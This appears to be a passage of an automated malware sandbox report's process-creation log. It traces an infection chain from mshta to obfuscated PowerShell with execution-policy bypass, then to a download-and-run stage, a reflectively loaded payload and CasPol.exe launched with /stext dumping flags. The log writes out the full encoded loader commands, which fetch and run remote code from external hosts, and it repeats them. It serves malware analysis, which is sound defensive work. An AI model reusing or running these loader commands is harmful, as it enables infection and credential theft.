          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp" "c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXEJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp" "c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; 